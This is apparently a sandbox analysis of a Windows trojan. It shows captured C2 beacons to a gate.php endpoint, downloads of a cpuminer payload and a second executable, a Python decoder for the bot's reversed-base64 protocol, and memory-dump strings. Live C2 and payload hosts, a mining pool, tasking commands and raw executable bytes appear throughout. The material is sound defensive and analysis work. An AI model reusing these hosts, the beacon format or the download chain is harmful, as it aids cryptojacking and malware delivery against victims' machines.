'Z........y.Ye.......M.._5.9..B.*.. .4z@.7#...... UL.F......iDg..6...'
z$.E.E..*..g...2.@D.....&v...o..>..k1N...P...i

<<< skipped >>>

GET /gett/9a2RqWN1/CPUMiner.files?response-content-disposition=attachment;&AWSAccessKeyId=AKIAI7XHZJPL62V2UOVA&Signature=qD9RH/IX4s2iZULzsbyWAN3tBVs=&Expires=1399780798 HTTP/1.1
Host: s3.kkloud.com.s3.amazonaws.com
Connection: Keep-Alive


HTTP/1.1 200 OK
x-amz-id-2: TeHG2XT52p6a12Oy8ifa0G2eLQCSJvBJzOirYekEb9zoHGypEejtZoDD0ROgw8at
x-amz-request-id: 9009543A81F42AD2
Date: Sun, 11 May 2014 03:57:43 GMT
Content-Disposition: attachment;
Last-Modified: Sun, 02 Mar 2014 22:54:08 GMT
ETag: "bb1f7298813a025110816dbf3abf16c1-1"
Accept-Ranges: bytes
Content-Type: application/octet-stream
Content-Length: 1511936
Server: AmazonS3
......................................................................
........................S.R.E.S.U._.Y.E.K.H.........................0.
..E.N.I.H.C.A.M._.L.A.C.O.L._.Y.E.K.H.........................@...R.E.
S.U._.T.N.E.R.R.U.C._.Y.E.K.H.........................>...G.I.F.N.O
.C._.T.N.E.R.R.U.C._.Y.E.K.H.........................B...T.O.O.R._.S.E
.S.S.A.L.C._.Y.E.K.H.........................>.............2.3.m.e.
t.s.y.S.\.>.t.o.o.R.m.e.t.s.y.S.<.......2.3.m.e.t.s.y.S.......`.
..^...\...J.........................................................&g
t;.t.o.o.R.m.e.t.s.y.S.<.......>.t.o.o.R.m.e.t.s.y.S.<.......
h...f...d...J.........................................................
......................................................................
......................................................................
.....................................7.7.7.7.7.7.7.7.7.7.7.7h7d7`7\7X7
T7P7L7H7D7@7<7874707,7(7$7 7.7.7.7.7.7.7.7.6.6.6.6.6.6.6.6.6.6.6.6.
6.6.6.6.6.6.6.6.6.6.6.6.6.6.6.6.6.6.6.6.6|6x6t6p6l6h6d6`6\6X6T6P6L6H6D
6@6<6864606,6(6$6 6.6.6.6.6.6.5.5.5.5.5.5.5.5.5.5...........0.0.0.0
|0x0t0p0l0h0d0`0\0X0T0P0L0H0D0@0<0804000,0(0$0 0.0.0.0....H......5.
5.5.5.5.5.5.4.4.4.4.4.4.4.4.4.4.4.4.2p2l2h2d2`2\2X2T2P2L2H2D2@2<282
4202,2(2$2 2.2.2.2.2.2.2.2.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1
.1.1.1.1.1.1.1.1.1.1.1|1x1t1p1l1h1d1`1\1X1T1P1L1H1D1@1<1.1.0.0.0.0.
0.0.0.0.......p...0.040 0.0.0.0.......@.2.1.1.1.1.1.1.1.1.1r1b1R1B121"
1.1.0.0.0.0.0....4..0.=A<.<.<o737.7.6.6.6.6.6i6U6F616.5.5

<<< skipped >>>

POST /wordpress/1/gate.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Host: popdown.me
Content-Length: 194
Expect: 100-continue
Connection: Keep-Alive


HTTP/1.1 100 Continue
....



crypt===gKtRWYqMDUYpieId0Mz4iMgAEIgATN1YTRgACIgASVQNEIvVHRgITKNRFKlJ3b
DBSKShCblRnbJpCIukUSgE0RWNFIlJXY31kVq4WatRWQqE0LOpiN4gHIQhFIzd3bk5WaXp
iM4IzN3QWY2QWMxkjZhZzNjNWNlFWZ4czN4UWYkRWM1ImYyMzYwEzM


HTTP/1.1 200 OK
Server: nginx
Date: Sun, 11 May 2014 03:46:18 GMT
Content-Type: text/html
Transfer-Encoding: chunked
Connection: keep-alive
Vary: Accept-Encoding
X-Powered-By: PHP/5.3.28
208..=wXZ4VmLyYDNzYDIkF2bs52dvR2Pi9Gbi9CMvEzZPZnSjJmNvMXZslmZvEzLpBXYv
QHduU2Zv8iOwRHdoBCZh9Gbud3bk5CdvJGfqMXZ5ByZtACNzITMgAXLgUFUH5CZtFmYiNG
I11CIzMzMzoTbvNmLz5WavNWLl1WLlZXan5yY0x2LvoDcjR3KtVHdhJHdzBybtACdwlncj
NHIh1iKgQWYvxmb39GZ/I2bsJ2Lx8SMOdVcSJTY58yclxWam9SMvkGch9Cd05SZn9yL6AH
d0hGI0JXY0NnL1B3ZuIXZulWb8VGbiFmbl5iclxGbptGdvJGfqMFRBVkUIRFI01CI0MjMx
oTVQNkLk1WYiJ2Yg8ULgMzMzMjOt92YuMnbp92YtUWbtUmdpdmLjRHbv8iOwNGdr0Wd0Fm
c0NHIv1CI0BXeyN2cgEWLqACZh9Gbud3bk9jYvxmYvAzLx40VxJlMhlzLzVGbpZ2Lx8Saw
F2L0RnLld2LvoDc0RHagQnchR3cuIXZulWb..0..


POST /wordpress/1/gate.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Host: popdown.me
Content-Length: 194
Expect: 100-continue
Connection: Keep-Alive


HTTP/1.1 100 Continue
....



crypt===gKtRWYqMDUYpieId0Mz4iMgAEIgATN1YTRgACIgASVQNEIvVHRgITKNRFKlJ3b
DBSKShCblRnbJpCIukUSgE0RWNFIlJXY31kVq4WatRWQqE0LOpiN4gHIQhFIzd3bk5WaXp
iM4IzN3QWY2QWMxkjZhZzNjNWNlFWZ4czN4UWYkRWM1ImYyMzYwEzM


HTTP/1.1 200 OK
Server: nginx
Date: Sun, 11 May 2014 03:46:37 GMT
Content-Type: text/html
Transfer-Encoding: chunked
Connection: keep-alive
Vary: Accept-Encoding
X-Powered-By: PHP/5.3.28
208..=wXZ4VmLyYDNzYDIkF2bs52dvR2Pi9Gbi9CMvEzZPZnSjJmNvMXZslmZvEzLpBXYv
QHduU2Zv8iOwRHdoBCZh9Gbud3bk5CdvJGfqMXZ5ByZtACNzITMgAXLgUFUH5CZtFmYiNG
I11CIzMzMzoTbvNmLz5WavNWLl1WLlZXan5yY0x2LvoDcjR3KtVHdhJHdzBybtACdwlncj
NHIh1iKgQWYvxmb39GZ/I2bsJ2Lx8SMOdVcSJTY58yclxWam9SMvkGch9Cd05SZn9yL6AH
d0hGI0JXY0NnL1B3ZuIXZulWb8VGbiFmbl5iclxGbptGdvJGfqMFRBVkUIRFI01CI0MjMx
oTVQNkLk1WYiJ2Yg8ULgMzMzMjOt92YuMnbp92YtUWbtUmdpdmLjRHbv8iOwNGdr0Wd0Fm
c0NHIv1CI0BXeyN2cgEWLqACZh9Gbud3bk9jYvxmYvAzLx40VxJlMhlzLzVGbpZ2Lx8Saw
F2L0RnLld2LvoDc0RHagQnchR3cuIXZulWb..0..
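The two POST requests to /wordpress/1/gate.php above carry one form field, crypt=, whose value starts with "=" or "==", and the server answers with a blob of the same shape. That is what base64 looks like when it is written backwards: reverse the text and it decodes cleanly. What follows is an added example, not code from the original report or from the malware itself. It embeds the two bodies exactly as captured; everything else (the strrev+base64 transform, the "*" and "|" separators, and the helper names decode_crypt, parse_checkin, parse_tasks and miner_options) was inferred from the decoded data, not taken from any published description of this bot.

```python
"""Added example (not code from the original report or from the malware):
decode the ``crypt=`` beacon in the gate.php exchange captured above."""
from __future__ import annotations

import base64
import binascii
import re

# First POST body from the capture (Content-Length: 194), wrapped lines joined.
CHECKIN_BODY = (
    "crypt===gKtRWYqMDUYpieId0Mz4iMgAEIgATN1YTRgACIgASVQNEIvVHRgITKNRFKlJ3b"
    "DBSKShCblRnbJpCIukUSgE0RWNFIlJXY31kVq4WatRWQqE0LOpiN4gHIQhFIzd3bk5WaXp"
    "iM4IzN3QWY2QWMxkjZhZzNjNWNlFWZ4czN4UWYkRWM1ImYyMzYwEzM"
)

# The 0x208-byte chunk the server sent back, with the "208" chunk-size line
# and the terminating "0" chunk stripped.
TASKING = (
    "=wXZ4VmLyYDNzYDIkF2bs52dvR2Pi9Gbi9CMvEzZPZnSjJmNvMXZslmZvEzLpBXYv"
    "QHduU2Zv8iOwRHdoBCZh9Gbud3bk5CdvJGfqMXZ5ByZtACNzITMgAXLgUFUH5CZtFmYiNG"
    "I11CIzMzMzoTbvNmLz5WavNWLl1WLlZXan5yY0x2LvoDcjR3KtVHdhJHdzBybtACdwlncj"
    "NHIh1iKgQWYvxmb39GZ/I2bsJ2Lx8SMOdVcSJTY58yclxWam9SMvkGch9Cd05SZn9yL6AH"
    "d0hGI0JXY0NnL1B3ZuIXZulWb8VGbiFmbl5iclxGbptGdvJGfqMFRBVkUIRFI01CI0MjMx"
    "oTVQNkLk1WYiJ2Yg8ULgMzMzMjOt92YuMnbp92YtUWbtUmdpdmLjRHbv8iOwNGdr0Wd0Fm"
    "c0NHIv1CI0BXeyN2cgEWLqACZh9Gbud3bk9jYvxmYvAzLx40VxJlMhlzLzVGbpZ2Lx8Saw"
    "F2L0RnLld2LvoDc0RHagQnchR3cuIXZulWb"
)


def decode_crypt(value: str) -> str:
    """Inferred transform: the value is base64 written backwards (the '='
    padding sits at the front), so reverse it and decode. Rejects junk."""
    try:
        return base64.b64decode(value[::-1], validate=True).decode("utf-8")
    except (binascii.Error, UnicodeDecodeError) as exc:
        raise ValueError(f"not a reversed-base64 blob: {exc}") from exc


def encode_crypt(text: str) -> str:
    """Inverse of decode_crypt, for emulating the bot against a sinkhole."""
    return base64.b64encode(text.encode("utf-8")).decode("ascii")[::-1]


def form_value(body: str, field: str = "crypt") -> str:
    """Raw value of a form field. The bot does not percent-encode, so the
    leading '=' signs of the value survive; split only on the first '='."""
    name, sep, value = body.partition("=")
    if not sep or name != field:
        raise ValueError(f"field {field!r} not found in body")
    return value


def parse_checkin(plain: str) -> list[str]:
    """Check-in record: '*'-separated fields as observed in the decoded
    request (bot id, OS, ..., privilege marker); trailing separator kept."""
    return plain.split("*")


def parse_tasks(plain: str) -> list[tuple[str, list[str]]]:
    """Tasking reply: tasks separated by '|'; inside a task the first word is
    the command and '*' separates its arguments (layout read off the data)."""
    tasks = []
    for raw in filter(None, plain.split("|")):
        head, *rest = raw.split("*")
        cmd, _, first_arg = head.partition(" ")
        args = [a.strip() for a in (first_arg, *rest) if a.strip()]
        tasks.append((cmd, args))
    return tasks


_POOL_OPT = re.compile(r"(?:^|\s)-(o|O|p)\s+(\S+)")


def miner_options(args: list[str]) -> dict[str, str]:
    """cpuminer options worth blocking: -o pool URL, -O user:pass, -p pass.
    A regex rather than shlex, because the argument string carries an
    unbalanced double quote that would make shlex raise."""
    return dict(_POOL_OPT.findall(" ".join(args)))


if __name__ == "__main__":
    print("check-in:", parse_checkin(decode_crypt(form_value(CHECKIN_BODY))))
    for cmd, args in parse_tasks(decode_crypt(TASKING)):
        extra = miner_options(args) if cmd.startswith("miner.") else ""
        print(cmd, args, extra)
```

Decoded, the request is a check-in: a 40-hex-digit bot id, "Windows XP x86", "N/A", "Admin", the VMware display adapter and CPU brand string of the analysis VM, "XP3" and "adm". The reply is a task list: miner.start and miner.gpu.start pointing at ge.tt share 9a2RqWN1 (the CPUMiner.files download from S3 seen above) with scrypt mining against stratum+tcp://ltc.give-me-coins.com:3333 as worker cbbamd.CPU, a botkiller.enable, and bot.download of ge.tt share 6bcJvOg1 saved as 63462.exe, which is the redirect chain at the end of this section. The pool host and the worker name appear nowhere on the page in clear and belong on the egress block list next to popdown.me; the decoded tasks also explain why the cvtres.exe dump below is full of cpuminer and stratum strings.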


GET /streams/6bcJvOg1/63462.exe?sig=-UXpeL0WanQIYatmLOL4OmQyO4lMnb17DsM&type=download HTTP/1.1
Host: w013064.blob2.ge.tt
Connection: Keep-Alive


HTTP/1.1 200 OK
date: Sun, 11 May 2014 03:57:49 GMT
last-modified: Thu, 08 May 2014 12:19:32 GMT
etag: "6e7e17710d7ca996bf5647cba9efbcee-1"
accept-ranges: bytes
content-type: application/x-msdownload
content-length: 278528
server: gbs
access-control-allow-origin: *
content-disposition: attachment
Connection: keep-alive
MZ......................@.............................................
..!..L.!This program cannot be run in DOS mode....$.......PE..L....vkS
................................. ........@.. ........................
............@.................................\...O...................
................................................................. ....
........... ..H............text........ ...................... ..`.rsr
c...............................@..@.reloc...............>.........
.....@..B........................H....... ...<...........H!........
.......................................(....(....*.0.......... ....(..
..r...p(....o.........(....o....s.... ....(....r...p(....o....o....(..
...(....r-..po....... ..........i].a....X....i2......(.........(.... .
...(....rI..p(....o....(....t.....o......o.........*:~......o....&*...
(....*................lSystem.Resources.ResourceReader, mscorlib, Vers
ion=2.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089#System.R
esources.RuntimeResourceSet............PADPADP"..N.........a.o.i.r.a.s
.........Czj7QiJMbypJOmgptLlia/ohTG8qTTpoaUtGYmtCIUxvKk06aClLRmJrQiFMb
ypNOmgpS0Zia0IhTG8qzTpoKUVZ2GVClUWiC/U7JORqEgoCMQE8HUUqSAlEayUDBSxOOE9
IKBoaXCVmCwViZQM8CiBVDExlS29hZiFMbypNOmh5DkZiJ0MiTGdcJmloKUtGYmtCIaxvK
EwxaSFLRpJrQiFsbypNOmgpZUBja0IBTG8qbTtoKUsGYmtiIUxvOk06bClLRmJrQiFIbyp
NOmgpS0YCakIhXG8qTTpoKUhGIu5CIVxvKl06aClLVmJrUiFMbypNOngpS0Zia0IhTG8qT
e5tKEsRYmtCIWxuKq0 aClLRmJrQiFMbypNOmgpS0ZiawIgTGMqTTpoKUtGYmtCIUxvKk0
6aClLRmJrQiFMbypNOmgpS0Zia0IhTG8qTTpoKUtGYmtCIUxvCk06YClLRmJrQiFMb

<<< skipped >>>

GET /CSC3-2010.crl HTTP/1.1
Accept: */*
User-Agent: Microsoft-CryptoAPI/5.131.2600.5512
Host: csc3-2010-crl.verisign.com
Connection: Keep-Alive
Cache-Control: no-cache
Pragma: no-cache


HTTP/1.1 200 OK
Server: Apache
ETag: "6796efe0dffeb866d24738665300f835:1399756509"
Last-Modified: Sat, 10 May 2014 21:15:09 GMT
Accept-Ranges: bytes
Content-Length: 126066
Date: Sun, 11 May 2014 03:57:54 GMT
Connection: keep-alive
Content-Type: application/pkix-crl
0...m0...T...0...*.H........0..1.0...U....US1.0...U....VeriSign, Inc.1
.0...U....VeriSign Trust Network1;09..U...2Terms of use at hXXps://www
.verisign.com/rpa (c)101.0,..U...%VeriSign Class 3 Code Signing 2010 C
A..140510210004Z..140524210004Z0...60!....c..k....D.k.....120708062201
Z0!... _...u.t.=.<.&...130218061114Z0!...&..].....P.k.:...120125130
117Z0!...7P.x....8.Q...s..130227010252Z0!...J.....Q..Y.[.....110404153
956Z0!...d...=..q!_...g9..130729145216Z0!...l.....h2<.H......120329
152211Z0!...q.9...`H.*.Y.C...120525202212Z0!...s...TM.......0...121221
080842Z0!...t..,.. ...eL.....130314222305Z0!...y..r.HW.v.....w..140423
054643Z0!..../u.......A..5...101214165045Z0!.....0.Xc...%...iM..121102
230226Z0!.......S.a&.X5t.E]..111206083350Z0!....c.(....B.[M83...140108
164517Z0!....A.Sv.....f,.....110609003155Z0!.....z......!.ID{]..101228
182208Z0!....b^......{d.J'...130102154110Z0!......0..........I..130912
181631Z0!....6e...~..T.......130131012247Z0!.........bD#*u......130226
223939Z0!.......@..'$.).;}\..130121172259Z0!....7.v..........n..120724
160733Z0!....P;.Y..d...c.(...120209181451Z0!.....].bb[.....!....140328
205453Z0!.....a...L`..IV.....130402103508Z0!......fFW.z.....@T..130117
000242Z0!...........].{7.....120730000000Z0!...".......Z.V.,.e..121031
192224Z0!...'....[.1......g..130318195659Z0!...,GI.jH.|...J.....120518
121623Z0!...<%a.=.d.......O..120424164254Z0!...@........... .a..121
109212441Z0!...L.&L..o.8..=6....110311141238Z0!...L...5...s $.=.=..130
205142241Z0!...O.c.........t....130109132228Z0!...X.BS.G]T.l.w.i..

<<< skipped >>>

GET /1/files/6bcJvOg1/0/blob?download HTTP/1.1
Host: w269456.open.ge.tt
Connection: Keep-Alive


HTTP/1.1 307 Temporary Redirect
location: hXXp://w013064.blob2.ge.tt/streams/6bcJvOg1/63462.exe?sig=-UXpeL0WanQIYatmLOL4OmQyO4lMnb17DsM&type=download
connection: keep-alive
transfer-encoding: chunked


The Trojan connects to the servers at the following location(s):

Strings from Dumps

WScript.exe_2280:

.text
`.data
.rsrc
@.reloc
ADVAPI32.dll
KERNEL32.dll
NTDLL.DLL
USER32.dll
msvcrt.dll
OLEAUT32.dll
ole32.dll
VERSION.dll
wscript.exe
advapi32.dll
kernel32.dll
%s%s.DLL
wintrust.dll
%d.%d
Invalid parameter passed to C runtime function.
SOFTWARE\Classes\%s\%s
0x%8X
CreateURLMonikerEx
urlmon.dll
@@8X%u
RegCreateKeyA
RegCloseKey
RegOpenKeyA
RegDeleteKeyA
RegCreateKeyExW
RegCreateKeyExA
RegOpenKeyExW
ReportEventW
RegEnumKeyExA
RegOpenKeyExA
GetProcessHeap
GetCPInfo
MsgWaitForMultipleObjects
EnumThreadWindows
wscript.pdb
stdole2.tlbWWW
.ObjectWW
KeyW
WindowsFolderWWW4
%CopyFolderWWL
Windows Script Host (Ver 5.6)W)
Windows Script Host Application InterfaceW%
Windows Script Host Object
ebstrCmdLineW
78t8x8
5Q5F5
Software\Microsoft\Windows Script Host\Settings
Windows Script Host
WScript.CreateObject
WSHRemote.Execute
Software\Microsoft\Active Setup\Installed Components\{89820200-ECBD-11CF-8B85-00AA005B4383}
.\%s.mui
.\%s\%s.mui
%s\%s.mui
%s\%s\%s.mui
%s\%s
Microsoft (R) Windows Based Script Host
5.7.0.16599
Microsoft (R) Windows Script Host
(Windows Script Host (debugging disabled)
Windows Script Host Error
Windows Script Host Input Error
This Unicode version of Windows Script Host will only execute under Windows NT.
Please use the ANSI version of Windows Script Host."
WScript execution time was exceeded on script "%1!ls!".
Script execution was terminated.1Could not locate automation class named "%1!ls!".
Could not connect object.'Could not create object named "%1!ls!".1Initialization of the Windows Script Host failed.6Can't find script engine "%2!ls!" for script "%1!ls!".!Can't change default script host.=An attempt at saving your settings via the //S option failed.(Loading script "%1!ls!" failed (%2!ls!).
Loading your settings failed.,Execution of the Windows Script Host failed.,Unexpected error of the Windows Script Host._Windows Script Host access is disabled on this machine. Contact your administrator for details.
Missing job name.*Unicode is not supported on this platform.
Command line options are saved.4The default script host is now set to "wscript.exe".4The default script host is now set to "cscript.exe".,Successful execution of Windows Script Host.3Successful remote execution of Windows Script Host.
Win32 Error 0x%X
Windows Script Host(Windows Script Host (debugging disabled)
Usage: WScript scriptname.extension [option...] [arguments...]
Use engine for executing script
Changes the default script host to CScript.exe
Changes the default script host to WScript.exe (default)
Prevent logo display: No banner will be shown at execution time
#WScript Error - Windows Script Host!Input Error - Windows Script HostlThis Unicode version of WScript will only execute under Windows NT.
%6!ls! WScript - Script Execution Error!Windows Script Host Remote Script/Remote script object can only be executed once. Unable to execute remote script.

%original file name%.exe_1180_rwx_00D10000_0000F000:

u.iD$
.WfxP

%original file name%.exe_1180_rwx_04AA0000_0000A000:

d.buh

%original file name%.exe_1180_rwx_675A6000_00003000:

.Qg<-Qg
*Rg`.Rg|)RgL Rg

WScript.exe_3524:

.text
`.data
.rsrc
@.reloc
ADVAPI32.dll
KERNEL32.dll
NTDLL.DLL
USER32.dll
msvcrt.dll
OLEAUT32.dll
ole32.dll
VERSION.dll
wscript.exe
advapi32.dll
kernel32.dll
%s%s.DLL
wintrust.dll
%d.%d
Invalid parameter passed to C runtime function.
SOFTWARE\Classes\%s\%s
0x%8X
CreateURLMonikerEx
urlmon.dll
@@8X%u
RegCreateKeyA
RegCloseKey
RegOpenKeyA
RegDeleteKeyA
RegCreateKeyExW
RegCreateKeyExA
RegOpenKeyExW
ReportEventW
RegEnumKeyExA
RegOpenKeyExA
GetProcessHeap
GetCPInfo
MsgWaitForMultipleObjects
EnumThreadWindows
wscript.pdb
stdole2.tlbWWW
.ObjectWW
KeyW
WindowsFolderWWW4
%CopyFolderWWL
Windows Script Host (Ver 5.6)W)
Windows Script Host Application InterfaceW%
Windows Script Host Object
ebstrCmdLineW
78t8x8
5Q5F5
Software\Microsoft\Windows Script Host\Settings
Windows Script Host
WScript.CreateObject
WSHRemote.Execute
Software\Microsoft\Active Setup\Installed Components\{89820200-ECBD-11CF-8B85-00AA005B4383}
.\%s.mui
.\%s\%s.mui
%s\%s.mui
%s\%s\%s.mui
%s\%s
Microsoft (R) Windows Based Script Host
5.7.0.16599
Microsoft (R) Windows Script Host
(Windows Script Host (debugging disabled)
Windows Script Host Error
Windows Script Host Input Error
This Unicode version of Windows Script Host will only execute under Windows NT.
Please use the ANSI version of Windows Script Host."
WScript execution time was exceeded on script "%1!ls!".
Script execution was terminated.1Could not locate automation class named "%1!ls!".
Could not connect object.'Could not create object named "%1!ls!".1Initialization of the Windows Script Host failed.6Can't find script engine "%2!ls!" for script "%1!ls!".!Can't change default script host.=An attempt at saving your settings via the //S option failed.(Loading script "%1!ls!" failed (%2!ls!).
Loading your settings failed.,Execution of the Windows Script Host failed.,Unexpected error of the Windows Script Host._Windows Script Host access is disabled on this machine. Contact your administrator for details.
Missing job name.*Unicode is not supported on this platform.
Command line options are saved.4The default script host is now set to "wscript.exe".4The default script host is now set to "cscript.exe".,Successful execution of Windows Script Host.3Successful remote execution of Windows Script Host.
Win32 Error 0x%X
Windows Script Host(Windows Script Host (debugging disabled)
Usage: WScript scriptname.extension [option...] [arguments...]
Use engine for executing script
Changes the default script host to CScript.exe
Changes the default script host to WScript.exe (default)
Prevent logo display: No banner will be shown at execution time
#WScript Error - Windows Script Host!Input Error - Windows Script HostlThis Unicode version of WScript will only execute under Windows NT.
%6!ls! WScript - Script Execution Error!Windows Script Host Remote Script/Remote script object can only be executed once. Unable to execute remote script.

nt32.exe_1324_rwx_00D20000_00010000:

u.iD$
.WexP

nt32.exe_1324_rwx_675A6000_00003000:

.Qg<-Qg
*Rg`.Rg|)RgL Rg

cvtres.exe_3500:

.text
``.data
.rdata
`@.bss
.idata
.main
.bxpck
66665\\\\
\\\\5\\\\
666656666
libgcj-12.dll
JSON decode of %s failed
http://
https://
stratum tcp://
http://%s
cpuminer 2.3.2
accepted: %lu/%lu (%.2f%%), %s khash/s %s
DEBUG: reject reason: %s
DEBUG: job_id='%s' extranonce2=%s ntime=x
Starting Stratum on %s
...terminating workio thread
...retry after %d seconds
JSON decode failed(%d): %s
{"method": "mining.submit", "params": ["%s", "%s", "%s", "%s", "%s"], "id":4}
{"method": "getwork", "params": [ "%s" ], "id":1}
JSON key '%s' not found
JSON key '%s' is not a string
CURL initialization failed
%s%s%s
Long-polling activated for %s
json_rpc_call failed, retry after %d seconds
DEBUG: got new work in %d ms
Binding thread %d to cpu %d
thread %d: %lu hashes, %s khash/s
Total: %s khash/s
work retrieval failed, exiting mining thread %d
http://127.0.0.1:9332/
%s: unsupported non-option argument '%s'
JSON option %s invalid
https:
%s:%s
thread %d create failed
%d miner threads started, using '%s' algorithm.
cert
userpass
-o, --url=URL URL of mining server (default: http://127.0.0.1:9332/)
-O, --userpass=U:P username:password pair for mining server
-p, --pass=PASSWORD password for mining server
--cert=FILE certificate for mining server using SSL
-x, --proxy=[PROTOCOL://]HOST[:PORT] connect through a proxy
--no-longpoll disable X-Long-Polling support
--no-stratum disable X-Stratum support
[%d-d-d d:d:d] %s
User-Agent: cpuminer/2.3.2
HTTP request failed: %s
JSON-RPC call failed: %s
hex2bin failed on '%s'
DEBUG: %s
Hash: %s
Target: %s
http%s
http_proxy
Stratum connection failed: %s
{"id": 1, "method": "mining.subscribe", "params": []}
{"id": 1, "method": "mining.subscribe", "params": ["cpuminer/2.3.2", "%s"]}
{"id": 1, "method": "mining.subscribe", "params": ["cpuminer/2.3.2"]}
mining.notify
Stratum session id: %s
mining.set_difficulty
client.reconnect
stratum tcp://%s:%d
Server requested reconnection to %s
client.get_version
cpuminer/2.3.2
client.show_message
MESSAGE FROM SERVER: %s
{"id": 2, "method": "mining.authorize", "params": ["%s", "%s"]}
%s near '%s'
%s near end of file
unable to decode byte 0x%x at position %d
control character 0x%x
invalid Unicode '\uX\uX'
invalid Unicode '\uX'
end == saved_text   lex->saved_text.length
unable to open %s: %s
\ux
\ux\ux
mingwm10.dll
__mingwthr_remove_key_dtor
__mingwthr_key_dtor
VirtualQuery failed for %d bytes at address %p
Unknown pseudo relocation protocol version %d.
Unknown pseudo relocation bit size %d.
%s: option requires an argument -- %c
%s: unrecognised option `-%s'
%s: invalid option -- %c
option `%s%s' doesn't accept an argument
option `%s%s' requires an argument
%s: option `%s' is ambiguous
%s: unrecognised option `%s'
0123456789
1399780752 312
curl_easy_cleanup
curl_easy_init
curl_easy_perform
curl_easy_reset
curl_easy_setopt
curl_global_init
curl_slist_append
curl_slist_free_all
curl_version
pthread_join
libcurl-4.dll
KERNEL32.dll
msvcrt.dll
pthreadGC2.dll
WS2_32.dll
zcÁ
KERNEL32.DLL
USER32.DLL
EnumChildWindows
kernel32.dll
ntdll.dll
mscoree.dll
.mixcrt
Please contact the application's support team for more information.
- Attempt to initialize the CRT more than once.
- CRT not initialized
- floating point support not loaded
GetProcessWindowStation
operator
USER32.dll
SHELL32.dll
OLEAUT32.dll
GetProcessHeap
GetCPInfo
GetConsoleOutputCP
EXEPackerHost32.exe
?m_IID@@3RCU_IMAGE_IMPORT_DESCRIPTOR@@C
`.rdata
@.data
.rsrc
@.reloc
.\BoxedAppSDK_StaticLib.cpp
BoxedAppSDK_TryCreateProcessForVirtualEXE_AnotherBitnessPartHelper
BoxedAppSDK_AttachMixedBitnessProcessHelper
BoxedAppSDK_EnumVirtualRegKeysA
BoxedAppSDK_EnumVirtualRegKeysW
BoxedAppSDK_ExecuteDotNetApplicationA
BoxedAppSDK_ExecuteDotNetApplicationW
BoxedAppSDK_DeleteVirtualRegKeyByHandle
BoxedAppSDK_DeleteVirtualRegKeyW
BoxedAppSDK_DeleteVirtualRegKeyA
BoxedAppSDK_CreateVirtualRegKeyW
BoxedAppSDK_CreateVirtualRegKeyA
C62E2B35-E4B3-4019-A7C4-F50AC7F78470
Get exe dir...
Get exe dir...done
Get the extension...done
Get current dir...done
Get old args...done
The command line overriding: %s
GetCommandLineW preparing to intercept...done
GetCommandLineA preparing to intercept...done
The embedding BoxedApp into child processes: %s
GetWindowsDirectoryW
RegCreateKeyExW
RegDeleteKeyW
RegCloseKey
ADVAPI32.dll
ole32.dll
EXEPackerStub32.dll
d:\build_area\boxedapp_src\src\boxedappsolution\exepackerstub\!output\exepackerstub32\release_full\EXEPackerStub32.pdb
l$D9.tO
FTPSW
u$D
TryCreateProcessForVirtualEXE, template exe found:
CBoxedAppCore::My_NtDeleteKey, KeyHandle = 0x
CBoxedAppCore::My_NtEnumerateValueKey, KeyHandle = 0x
CBoxedAppCore::My_NtFlushKey, KeyHandle = 0x
CBoxedAppCore::My_NtNotifyChangeKey, KeyHandle = 0x
CBoxedAppCore::My_NtQueryKey, KeyHandle =
CBoxedAppCore::My_NtQueryMultipleValueKey, KeyHandle =
CBoxedAppCore::My_NtSetInformationKey, KeyHandle = 0x
KernelBase.dll
0x%x%x
CBoxedAppCore::My_NtCreateKey, ObjectAttributes = '
CBoxedAppCore::My_NtDeleteValueKey, KeyHandle = 0x
CBoxedAppCore::My_NtLoadKey, DestinationKeyName = '
CBoxedAppCore::My_NtQueryValueKey, KeyHandle = 0x
CBoxedAppCore::My_NtReplaceKey, BackupHiveFileName = '
CBoxedAppCore::My_NtSetValueKey, KeyHandle = 0x
CBoxedAppCore::My_NtUnloadKey, DestinationKeyName = '
CBoxedAppCore::My_NtRenameKey, KeyHandle =
BoxedAppSDK::CBoxedAppCore::TryCreateProcessForVirtualEXE_AnotherBitnessPart
: Can't create process of rundll32.exe, last error =
{4F95F74C-9713-4181-ACDD-8A50195FBC0F}
BoxedAppSDK::CBoxedAppCore::AttachToProcess_WithProcessHelper
BoxedAppSDK::CBoxedAppCore::AttachMixedBitnessProcessHelper
CBoxedAppCore::My_NtLoadKey2, DestinationKeyName = '
CBoxedAppCore::My_NtRestoreKey, KeyHandle = 0x
CBoxedAppCore::My_NtSaveKey, KeyHandle = 0x
:\VirtualDllWithSameImport.dll
:\VirtualDllWithTls.dll
VirtualDllWithTls.dll
VirtualDllWithSameImport.dll
WinExec
advapi32.dll
NtRenameKey
NtUnloadKey
NtSetValueKey
NtSetInformationKey
NtSaveKey
NtRestoreKey
NtReplaceKey
NtQueryValueKey
NtQueryMultipleValueKey
NtQueryKey
NtOpenKeyEx
NtOpenKey
NtNotifyChangeKey
NtLoadKey2
NtLoadKey
NtFlushKey
NtEnumerateValueKey
NtEnumerateKey
NtDeleteValueKey
NtDeleteKey
NtCreateKey
[BOXEDAPP][pid:%d][tid:%d][ %.2d:%.2d:%.2d.%.3d]
FILE_EXECUTE
GENERIC_EXECUTE
KEY_WOW64_64KEY
KEY_WOW64_32KEY
KEY_NOTIFY
KEY_CREATE_LINK
KEY_ENUMERATE_SUB_KEYS
KEY_CREATE_SUB_KEY
KEY_SET_VALUE
KEY_QUERY_VALUE
SECTION_MAP_EXECUTE
PAGE_EXECUTE_WRITECOPY
PAGE_EXECUTE_READWRITE
PAGE_EXECUTE_READ
PAGE_EXECUTE
STATUS_PRIMARY_TRANSPORT_CONNECT_FAILED
STATUS_LOCAL_USER_SESSION_KEY
STATUS_NULL_LM_PASSWORD
STATUS_IMAGE_MACHINE_TYPE_MISMATCH_EXE
STATUS_CARDBUS_NOT_SUPPORTED
STATUS_INVALID_PORT_ATTRIBUTES
STATUS_PORT_MESSAGE_TOO_LONG
STATUS_PORT_DISCONNECTED
STATUS_PORT_CONNECTION_REFUSED
STATUS_INVALID_PORT_HANDLE
STATUS_PORT_ALREADY_SET
STATUS_EAS_NOT_SUPPORTED
STATUS_CTL_FILE_NOT_SUPPORTED
STATUS_WRONG_PASSWORD
STATUS_ILL_FORMED_PASSWORD
STATUS_PASSWORD_RESTRICTION
STATUS_PASSWORD_EXPIRED
STATUS_FLOAT_DENORMAL_OPERAND
STATUS_FLOAT_INVALID_OPERATION
